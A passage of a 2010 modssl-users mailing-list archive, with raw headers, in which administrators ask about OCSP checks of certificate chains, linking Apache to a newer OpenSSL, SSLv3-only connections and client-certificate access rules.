	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Tue, 17 Aug 2010 10:00:44 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.72)
	(envelope-from )
	id 1OlMiU-0005XK-Os; Tue, 17 Aug 2010 15:00:38 +0100
Date: Tue, 17 Aug 2010 15:00:38 +0100
From: Joe Orton 
To: Ulf Wahlqvist 
Cc: "modssl-users@modssl.org" 
Subject: Re: OCSP-validation fails - Wrong cert passed to OCSP by Apache
Message-ID: <20100817140038.GA21059@redhat.com>
Mail-Followup-To: Ulf Wahlqvist ,
	"modssl-users@modssl.org" 
References: 
 
 
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.5.20 (2009-08-17)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.67 on 10.5.11.16
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Aug 17, 2010 at 12:47:26PM +0200, Ulf Wahlqvist wrote:
> I still don't get it. I used Wireshark and found out that the 
> certificate sent to the OCSP-responder is the CA-cert, not the 
> client-cert to be validated! I am clueless.

The code tries to verify each cert in the client cert chain from issuing 
CA down to the end-entity client cert with the OCSP responder - this is 
expected behaviour.

The modssl-users@ was used for discussion of mod_ssl for Apache httpd 
1.3.  For discussion of OCSP in httpd 2.3 I'd recommend 
users@httpd.apache.org - file bugs if you think the code is buggy.

http://issues.apache.org/bugzilla/

Regards, Joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 18 08:06:36 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1230914DA2C; Wed, 18 Aug 2010 08:06:36 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailgw2.cybercomgroup.com (mailgw2.cybercomgroup.com [193.108.42.46])
	by master.modssl.org (Postfix) with ESMTP id CCB8214D83F
	for ; Wed, 18 Aug 2010 08:06:19 +0200 (CEST)
Received: from MMACAS01.global.ad (unknown [192.168.9.7])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by mailgw2.cybercomgroup.com (Postfix) with ESMTPS id A860261A52;
	Wed, 18 Aug 2010 08:03:41 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=cybercomgroup.com;
	s=mail; t=1282111421;
	bh=QtbDLJYAqpvgw2vmswzeLCvCeJsFlPnahV5EW3K3Ia4=;
	h=From:To:CC:Date:Subject:Message-ID:References:In-Reply-To:
	 Content-Type:Content-Transfer-Encoding:MIME-Version;
	b=xEzCOA2dD7z9cL6oDlz8rSOGYfcuIHJjueA+h1GxT9vwxS8t18qhgRwe7gqMfUk+E
	 gVARN+M+FPReqraAlA1i917c7GDOfxUHFxaGN1KxXpFcz5T57T8q1LxV4EZVZcxlZ1
	 vEY2mUca1gLPOpIgQyTEvD8XPi9qcElImErzxxK0=
Received: from MMAMBX00.global.ad ([10.130.0.12]) by MMACAS01.global.ad
 ([10.130.2.21]) with mapi; Wed, 18 Aug 2010 08:03:47 +0200
From: Ulf Wahlqvist 
To: Joe Orton 
CC: "modssl-users@modssl.org" 
Date: Wed, 18 Aug 2010 08:03:44 +0200
Subject: RE: OCSP-validation fails - Wrong cert passed to OCSP by Apache
Thread-Topic: OCSP-validation fails - Wrong cert passed to OCSP by Apache
Thread-Index: Acs+FJ7y8VXq2LVGSVe0eQ+gIO9kIQAhcLKg
Message-ID: 
References: 
 
 
 <20100817140038.GA21059@redhat.com>
In-Reply-To: <20100817140038.GA21059@redhat.com>
Accept-Language: sv-SE
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: sv-SE
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: base64
MIME-Version: 1.0
X-CybercomGroup-MailScanner-ID: A860261A52.A75A6
X-CybercomGroup-MailScanner: Found to be clean
X-CybercomGroup-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
	score=-2.9, required 6, autolearn=not spam, ALL_TRUSTED -1.00,
	BAYES_00 -1.90)
X-CybercomGroup-MailScanner-From: ulf.wahlqvist@cybercomgroup.com
X-Spam-Status: No
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ulf Wahlqvist 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

VGhhbmtzLA0KDQpXaHkgZGlkbid0IEkgY2hlY2sgdGhhdD8gV2VsbCwgSSBtYWRlIGl0IHZhbGlk
YXRlIGNvcnJlY3RseSBieSBkb2luZyBhIHZlcnkgc3RyYW5nZSBhbmQgbm90IHVzYWJsZSB3b3Jr
YXJvdW5kLiBJIGJlbGlldmUgc29tZXRoaW5nIGlzIGJyb2tlbi4NCkkgZm9sbG93ZWQgeW91ciBz
dWdnZXN0aW9uIGFuZCBwb3N0ZWQgYSBtb3JlIGNvbXBsZXRlIGVudHJ5IHRvIHRoZSB1c2Vyc0Bo
dHRwZC5hcGFjaGUub3JnIGxpc3QuIEkgd2lsbCBmaWxlIGEgYnVnIHJlcG9ydCBpZiBubyBvbmUg
Y2FuIHBvaW50IG91dCBhbnkgZXJyb3JzIEkgaGF2ZSBtYWRlLg0KDQovdWxmVw0KDQoNCi0tLS0t
T3JpZ2luYWwgTWVzc2FnZS0tLS0tDQpGcm9tOiBKb2UgT3J0b24gW21haWx0bzpqb3J0b25AcmVk
aGF0LmNvbV0NClNlbnQ6IGRlbiAxNyBhdWd1c3RpIDIwMTAgMTY6MDENClRvOiBVbGYgV2FobHF2
aXN0DQpDYzogbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcNClN1YmplY3Q6IFJlOiBPQ1NQLXZhbGlk
YXRpb24gZmFpbHMgLSBXcm9uZyBjZXJ0IHBhc3NlZCB0byBPQ1NQIGJ5IEFwYWNoZQ0KDQpPbiBU
dWUsIEF1ZyAxNywgMjAxMCBhdCAxMjo0NzoyNlBNICswMjAwLCBVbGYgV2FobHF2aXN0IHdyb3Rl
Og0KPiBJIHN0aWxsIGRvbid0IGdldCBpdC4gSSB1c2VkIFdpcmVzaGFyayBhbmQgZm91bmQgb3V0
IHRoYXQgdGhlIA0KPiBjZXJ0aWZpY2F0ZSBzZW50IHRvIHRoZSBPQ1NQLXJlc3BvbmRlciBpcyB0
aGUgQ0EtY2VydCwgbm90IHRoZSANCj4gY2xpZW50LWNlcnQgdG8gYmUgdmFsaWRhdGVkISBJIGFt
IGNsdWVsZXNzLg0KDQpUaGUgY29kZSB0cmllcyB0byB2ZXJpZnkgZWFjaCBjZXJ0IGluIHRoZSBj
bGllbnQgY2VydCBjaGFpbiBmcm9tIGlzc3VpbmcgQ0EgZG93biB0byB0aGUgZW5kLWVudGl0eSBj
bGllbnQgY2VydCB3aXRoIHRoZSBPQ1NQIHJlc3BvbmRlciAtIHRoaXMgaXMgZXhwZWN0ZWQgYmVo
YXZpb3VyLg0KDQpUaGUgbW9kc3NsLXVzZXJzQCB3YXMgdXNlZCBmb3IgZGlzY3Vzc2lvbiBvZiBt
b2Rfc3NsIGZvciBBcGFjaGUgaHR0cGQgMS4zLiAgRm9yIGRpc2N1c3Npb24gb2YgT0NTUCBpbiBo
dHRwZCAyLjMgSSdkIHJlY29tbWVuZCB1c2Vyc0BodHRwZC5hcGFjaGUub3JnIC0gZmlsZSBidWdz
IGlmIHlvdSB0aGluayB0aGUgY29kZSBpcyBidWdneS4NCg0KaHR0cDovL2lzc3Vlcy5hcGFjaGUu
b3JnL2J1Z3ppbGxhLw0KDQpSZWdhcmRzLCBKb2UNCg==
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  9 18:16:35 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 49B0414DA7E; Thu,  9 Sep 2010 18:16:35 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.heartlandamerica.com (mail.heartlandamerica.com [65.121.1.4])
	by master.modssl.org (Postfix) with SMTP id 5785314D9EB
	for ; Thu,  9 Sep 2010 18:16:17 +0200 (CEST)
Received: by mail.heartlandamerica.com (Postfix, from userid 4294967294)
	id E56B0448A2C2; Thu,  9 Sep 2010 11:13:55 -0500 (CDT)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	mail.heartlandamerica.com.private
X-Spam-Level: 
X-Spam-Status: No, score=-2.3 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00,
	HTML_MESSAGE autolearn=ham version=3.3.1
Received: from gunnergelleaea8 (unknown [172.16.202.69])
	by mail.heartlandamerica.com (Postfix) with ESMTPA id EEF90448A2B7
	for ; Thu,  9 Sep 2010 11:13:53 -0500 (CDT)
From: "Gunner Geller" 
To: 
Subject: Specifying the openssl version used with mod_ssl
Date: Thu, 9 Sep 2010 11:13:48 -0500
Message-ID: <00e701cb5039$fd717420$f8545c60$@com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00E8_01CB5010.149B6C20"
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: ActQOfsWi2FtTdcmTHSqLhzcwHqyvA==
Content-Language: en-us
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gunner Geller" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00E8_01CB5010.149B6C20
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit

 Hello,

    We are using mac Leopard OS. We have rolled our own Apache(2.2.16)
separate from the default install. We have also rolled our own OpenSSL to
the latest version. However when we compile Apache and enable mod_ssl it
still uses the old OpenSSL version. We can see it in our http headers:

 

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7l

 

When typing "openssl version" from my account and the root account I get:

OpenSSL 1.0.0a 1 Jun 2010

I've seen this in some apache configs:

--enable-ssl --with-ssl=/usr/local/ssl

I've tried the above with no success. According to the output I get when
configuring/making/installing apache it is finding openssl at the above
directory. The problem is though that the http header stays the same.

 

The problem is we can't upgrade the default openssl version on the OS
without apple providing the update. The outdated version is tripping our
security scans. Like I said we rolled our owned updated version but cannot
get apache/mod_ssl to use it. Any help is appreciated.

Thanks,

 

Gunner Geller


------=_NextPart_000_00E8_01CB5010.149B6C20
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
















 Hello,



    We are using mac Leopard OS. We =
have
rolled our own Apache(2.2.16) separate from the default install. We have =
also
rolled our own OpenSSL to the latest version. However when we compile =
Apache
and enable mod_ssl it still uses the old OpenSSL version. We can see it =
in our
http headers:



 



Apache/2.2.16 (Unix) mod_ssl/2.2.16 =
OpenSSL/0.9.7l



 



When typing “openssl version” from my =
account
and the root account I get:



OpenSSL 1.0.0a 1 Jun 2010



I've seen this in some apache configs:



--enable-ssl --with-ssl=3D/usr/local/ssl



I've tried the above with no success. According to the output I get when
configuring/making/installing apache it is finding openssl at the above
directory. The problem is though that the http header stays the =
same.



 



The problem is we can’t upgrade the default =
openssl
version on the OS without apple providing the update. The outdated =
version is
tripping our security scans. Like I said we rolled our owned updated =
version
but cannot get apache/mod_ssl to use it. Any help is =
appreciated.



Thanks,



 



Gunner Geller









------=_NextPart_000_00E8_01CB5010.149B6C20--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 13 19:50:48 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C885114DA5C; Mon, 13 Sep 2010 19:50:48 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail4.dslextreme.com (mail4.dslextreme.com [66.51.199.93])
	by master.modssl.org (Postfix) with SMTP id A59DB14D836
	for ; Mon, 13 Sep 2010 19:50:29 +0200 (CEST)
Received: (qmail 17103 invoked from network); 13 Sep 2010 17:48:06 -0000
Received: from unknown (HELO glsnet.net) (72.25.108.115)
	by mail4.dslextreme.com with SMTP; Mon, 13 Sep 2010 10:48:06 -0700
Received: from  [10.0.0.8] by glsnet.net with SMTP (EHLO [10.0.0.8])
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.9.5)); Mon, 13 Sep 2010 10:47:33 -0700
Message-ID: <4C8E63DD.4000707@glewis.com>
Date: Mon, 13 Sep 2010 10:48:13 -0700
From: "Gregg L. Smith" 
User-Agent: Thunderbird 2.0.0.24 (Windows/20100228)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Specifying the openssl version used with mod_ssl
References: <00e701cb5039$fd717420$f8545c60$@com>
In-Reply-To: <00e701cb5039$fd717420$f8545c60$@com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-ArGoMail-Authenticated: gregg@glsnet.net
X-MagicMail-UUID: 10b37166-bf5f-11df-be17-000c29c6406d
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gregg L. Smith" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Gunner,

Have you tried
--enable-ssl --with-ssl=/path/to/just/compiled/openssl ?

Regards,

Gregg

Gunner Geller wrote:
>  Hello,
> 
>     We are using mac Leopard OS. We have rolled our own Apache(2.2.16)
> separate from the default install. We have also rolled our own OpenSSL to
> the latest version. However when we compile Apache and enable mod_ssl it
> still uses the old OpenSSL version. We can see it in our http headers:
> 
>  
> 
> Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7l
> 
>  
> 
> When typing "openssl version" from my account and the root account I get:
> 
> OpenSSL 1.0.0a 1 Jun 2010
> 
> I've seen this in some apache configs:
> 
> --enable-ssl --with-ssl=/usr/local/ssl
> 
> I've tried the above with no success. According to the output I get when
> configuring/making/installing apache it is finding openssl at the above
> directory. The problem is though that the http header stays the same.
> 
>  
> 
> The problem is we can't upgrade the default openssl version on the OS
> without apple providing the update. The outdated version is tripping our
> security scans. Like I said we rolled our owned updated version but cannot
> get apache/mod_ssl to use it. Any help is appreciated.
> 
> Thanks,
> 
>  
> 
> Gunner Geller
> 
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 13 23:24:41 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1CFE014DA74; Mon, 13 Sep 2010 23:24:41 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from Crpehubprd01.polycom.com (crpehubprd01.polycom.com [140.242.64.158])
	by master.modssl.org (Postfix) with ESMTP id AF58014DA66
	for ; Mon, 13 Sep 2010 23:24:22 +0200 (CEST)
Received: from Crpmboxprd01.polycom.com ([fe80::ad68:5a0:c919:66b6]) by
 Crpehubprd01.polycom.com ([fe80::27:216a:613a:350c%13]) with mapi; Mon, 13
 Sep 2010 14:22:00 -0700
From: "Hintz, Dan" 
To: "'modssl-users@modssl.org'" 
Date: Mon, 13 Sep 2010 14:21:59 -0700
Subject: SSLv3 alone (without TLSv1) does not work from client browser
Thread-Topic: SSLv3 alone (without TLSv1) does not work from client browser
Thread-Index: ActTiRM2JN6jP1p3RNejmB6/I+pA1gAAIXow
Message-ID: <132C7B325F671542B8CA2F02A1FFAF1F46708DC6@CRPMBOXPRD01.polycom.com>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: en-US
Content-Type: multipart/alternative;
	boundary="_000_132C7B325F671542B8CA2F02A1FFAF1F46708DC6CRPMBOXPRD01pol_"
MIME-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hintz, Dan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--_000_132C7B325F671542B8CA2F02A1FFAF1F46708DC6CRPMBOXPRD01pol_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

In our Apache conf file, we have the following directives:

SSLProtocol -all +SSLv3 +TLSv1
SSLCipherSuite ALL:!DH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2:!EXP:!eN=
ULL:!aNULL

When we use a browser (Internet Explorer, or Firefox) to connect, it will w=
ork if we have both SSLv3 and TLSv1 configured within the browser.  But, wh=
en we remove the TLSv1, we cannot connect.

Does anyone know what could be the problem?

Thanks in advance,
Dan


--_000_132C7B325F671542B8CA2F02A1FFAF1F46708DC6CRPMBOXPRD01pol_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















In=
 our
Apache conf file, we have the following directives:



 



SS=
LProtocol
-all +SSLv3 +TLSv1



SS=
LCipherSuite
ALL:!DH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2:!EXP:!eNULL:!aNULL=




 



Wh=
en we
use a browser (Internet Explorer, or Firefox) to connect, it will work if w=
e
have both SSLv3 and TLSv1 configured within the browser.  But, when we
remove the TLSv1, we cannot connect.



 



Do=
es
anyone know what could be the problem?



 



Th=
anks in
advance,



Da=
n



 









--_000_132C7B325F671542B8CA2F02A1FFAF1F46708DC6CRPMBOXPRD01pol_--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 15 23:52:01 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D162E14DA64; Fri, 15 Oct 2010 23:52:01 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from homiemail-a12.g.dreamhost.com (caiajhbdccah.dreamhost.com [208.97.132.207])
	by master.modssl.org (Postfix) with ESMTP id 457E814D838
	for ; Fri, 15 Oct 2010 23:52:01 +0200 (CEST)
Received: from homiemail-a12.g.dreamhost.com (localhost [127.0.0.1])
	by homiemail-a12.g.dreamhost.com (Postfix) with ESMTP id EB1A5714070
	for ; Fri, 15 Oct 2010 14:49:38 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; c=nofws; d=kickflop.net; h=message-id:date
	:from:mime-version:to:subject:content-type:
	content-transfer-encoding; q=dns; s=kickflop.net; b=c3+ZQDKBKFdG
	haFjZkQu853vLkZ45smVXEUKqU48+nFvckm5EZcxVnyczAnNsdLd+Y3b4tmFuXgU
	GOULtpPwqqkDyuKAGY1QDNR00P5crFO+tQol4roLeyvUfTB3v0TAUgOEpFsR/QtI
	BzylBrRwH+haUpbGZ5uzMfSu2Q7A+u4=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=kickflop.net; h=message-id
	:date:from:mime-version:to:subject:content-type:
	content-transfer-encoding; s=kickflop.net; bh=P3DDpith4jCbfsUCj0
	GUZk1vi8U=; b=J9zJxP8C22+MY7ML8hWb2YMLkYFC9iECwsjxNCYZWUiKbN6pIh
	vOVS4a3fDlt3XnrP3InjoP8Wuyaqu2+KmL1jC9lG7Wjgo7QIcrt3UrH9Ejl/YfF9
	MCU8UDNmSZEa4osGDhnHqLaF3or0QxfDTmdRbLpv0wPbRbOiEsCe+9t04=
Received: from [192.168.1.4] (pool-108-9-57-66.tampfl.fios.verizon.net [108.9.57.66])
	(using TLSv1 with cipher AES256-SHA (256/256 bits))
	(No client certificate requested)
	(Authenticated sender: jblaine@kickflop.net)
	by homiemail-a12.g.dreamhost.com (Postfix) with ESMTPSA id BAE3F714060
	for ; Fri, 15 Oct 2010 14:49:38 -0700 (PDT)
Message-ID: <4CB8CC6D.9080900@kickflop.net>
Date: Fri, 15 Oct 2010 17:49:33 -0400
From: Jeff Blaine 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.11) Gecko/20101013 Thunderbird/3.1.5
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Certs work, one doesn't, cannot determine why
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Blaine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi folks.  I'm *really* stumped here.  If anyone has any
ideas, I would love to hear them.  How can I debug this
further?  I need more information that Apache + mod_ssl
is giving me right now.

All version information and configuration detail is after
this next paragraph.

Works: SSL via my corporate cert, SSL via 3 other people's
        corporate certs
Fails: 1 person's cert so far, yet is logged as "SUCCESS"
        when logging SSL_CLIENT_VERIFY via CustomLog

Example:

[15/Oct/2010:09:53:38 -0400] 1xx.xx.160.92 on TLSv1 RC4-MD5 128 
/O=our.org/OU=People/UID=mbs/CN=Simpson Mary B SUCCESS 3 452E Simpson 
Mary B - "GET /index.html HTTP/1.1" 295

[Fri Oct 15 09:53:38 2010] [error] [client 1xx.xx.160.92] access to 
/apps/rtsrv1dev/share/html/index.html failed, reason: SSL requirement 
expression not fulfilled (see SSL logfile for more details)

Config Specifics:

OS: RHELv5
Apache: 2.2.3
mod_ssl: 2.2.3-43.el5


     ServerName rtdev1.our.org:443

     ErrorLog logs/ssl_error443_log
     TransferLog logs/ssl_access443_log
     LogLevel warn

     SSLEngine on
     SSLProtocol all -SSLv2
     SSLCipherSuite ALL:!ADH:!EXPORT:SSLv3:RC4+RSA:+HIGH:+MEDIUM:+LOW
     SSLCertificateFile /apps/rtsrv1dev/PKI/rtdev1-signed.cer
     SSLCertificateKeyFile /apps/rtsrv1dev/PKI/rtdev1.key
     SSLCertificateChainFile /apps/rtsrv1dev/PKI/rtdev1-signed.cer
     SSLCACertificateFile /apps/rtsrv1dev/PKI/MITRE-cert-bundle.cer
     SSLVerifyClient require
     SSLVerifyDepth  2

     SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire

     
         SSLOptions +StdEnvVars
     
     
         SSLOptions +StdEnvVars
     

     SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

     CustomLog logs/ssl_access443_log \
         "%h - - %t \"%r\" %{HTTPS}x %{SSL_PROTOCOL}x"

     CustomLog logs/ssl_error443_log \
         "%t %h %{HTTPS}x %{SSL_PROTOCOL}x %{SSL_CIPHER}x 
%{SSL_CIPHER_USEKEYSIZE}x %{SSL_CLIENT_S_DN}x %{SSL_CLIENT_VERIFY}x 
%{SSL_CLIENT_M_VERSION}x %{SSL_CLIENT_M_SERIAL}x %{SSL_CLIENT_S_DN_CN}x 
%{SSL_CLIENT_S_DN_UID}x \"%r\" %b"

     DocumentRoot /apps/rtsrv1dev/share/html
     AddDefaultCharset UTF-8
     PerlRequire "/apps/rtsrv1dev/bin/webmux.pl"
         SetHandler default
     

     
         SetHandler perl-script
         PerlResponseHandler RT::Mason
         SSLVerifyClient require

         SSLRequire %{SSL_CLIENT_S_DN} in { \
              "/O=our.org/OU=people/UID=jblaine/CN=Blaine Charles J.", \
              "/O=our.org/OU=people/UID=mloveless/CN=Laveless Marc W.", \
              "/O=our.org/OU=people/UID=mbs/CN=Simpson Mary B", \
              "/O=our.org/OU=people/UID=bcietta/CN=Cietta Barbara A." \
         }
     

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 17 02:21:44 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1584B14DA7F; Sun, 17 Oct 2010 02:21:44 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-qy0-f175.google.com (mail-qy0-f175.google.com [209.85.216.175])
	by master.modssl.org (Postfix) with ESMTP id E105314D86B
	for ; Sun, 17 Oct 2010 02:21:26 +0200 (CEST)
Received: by qyk31 with SMTP id 31so2710183qyk.13
        for ; Sat, 16 Oct 2010 17:19:02 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:received:date:message-id
         :subject:from:to:content-type;
        bh=uJa83zO1e6hRys92Vv0Mm2s2sy62VU/jPSH65SbFRQA=;
        b=Me4NL0p0/E81LtxEYgQ17tKb0QFWd1Z5Y9UeJyFGujRIVZmjeyFFdsqWvi/R+r2H3B
         wJZAIDy3gUTPpVvI1B50TJKbBsT1K2YT3dujwPMRXSIZliLO0/rfIMTmqwHS4S5ZEhQF
         m90CQEnR1+ptrPrR5MbUZu4+EaXLwkbMQEKro=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type;
        b=bRddU2HxbpvBI6REmzTxC+vqlld+2k3+HhYf1jyvVn7U8+YmeAO7db4G1IQyJqhsw+
         znuvPfeJ/E5IOgJibYhu8uYSnOIiX1JpQ7YgbVgmcvDagVAsU1VJzj1uwc1ta9tW6EzZ
         vltneZoGIs4BIiYoB0GBK46JDUB2hXc9C+/kI=
MIME-Version: 1.0
Received: by 10.229.184.198 with SMTP id cl6mr2273899qcb.240.1287274742393;
 Sat, 16 Oct 2010 17:19:02 -0700 (PDT)
Received: by 10.229.20.136 with HTTP; Sat, 16 Oct 2010 17:19:02 -0700 (PDT)
Date: Sat, 16 Oct 2010 20:19:02 -0400
Message-ID: 
Subject: Client Authentication
From: rangeli nepal 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rangeli nepal 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Good Afternoon Everybody,

I am not sure if it is the right forum to ask this question. If not
please guide me.

mod_ssl provides fabulous mechanism of doing client authentication. It
does so by  issuing client certificates  signed by your own CA
certificate ca.crt.


 How we can use mod_ssl ( with client auth)  when we we do not have
control on whole community i.e people are using certificates that is
signed by different CA.?

 One way I was thinking was to accumulate public certs ( which may not
be CA cert)  at one place( directory) and give its path to mod_ssl.

However I am not sure if this a good practice or even doable practice.

Any input will be highly appreciated.
Thank you.
rn
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 19 22:38:37 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D3A0314DA99; Tue, 19 Oct 2010 22:38:37 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from homiemail-a22.g.dreamhost.com (caiajhbdcahe.dreamhost.com [208.97.132.74])
	by master.modssl.org (Postfix) with ESMTP id B816314D851
	for ; Tue, 19 Oct 2010 22:38:20 +0200 (CEST)
Received: from homiemail-a22.g.dreamhost.com (localhost [127.0.0.1])
	by homiemail-a22.g.dreamhost.com (Postfix) with ESMTP id 3F9021A8076
	for ; Tue, 19 Oct 2010 13:35:55 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; c=nofws; d=kickflop.net; h=message-id:date
	:from:mime-version:to:subject:references:in-reply-to
	:content-type:content-transfer-encoding; q=dns; s=kickflop.net;
	 b=A3JvwRw1Ozq4Fr6YHcgc5416yot5PWPeFi8Hm3CRJnM3DFczQ4y4gq7Ipmlth
	FsdFLCUjA88r4HfTh6vU0g3qCRcsVXtVf5R7BSoB4kEgsTL2qT8T4STWCU073GB9
	c+VRXc5+KRtoc/BhXXajKyy1lUFHrOAaHS8a6O9QfhPQVY=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=kickflop.net; h=message-id
	:date:from:mime-version:to:subject:references:in-reply-to
	:content-type:content-transfer-encoding; s=kickflop.net; bh=H3tw
	xCslTA1OxNzytQPHu94UY8w=; b=6UeGqnET8kIujXCKxjuHRemyWI5eno+r5LSQ
	Y1mNfc0A+//wI/UO+FFjRdCFDubuJeLM2SSJBrt+9AX/n2Bl9p3TAb2qf9ppu2Zw
	UTtT1L3D17bIIFBF3tKu5TmYe+5bYsux/k9CITVsZ3ycfWhCiqnfrDdRJf21ce/7
	bhnCHGc=
Received: from [192.168.1.4] (pool-108-9-57-66.tampfl.fios.verizon.net [108.9.57.66])
	(using TLSv1 with cipher AES256-SHA (256/256 bits))
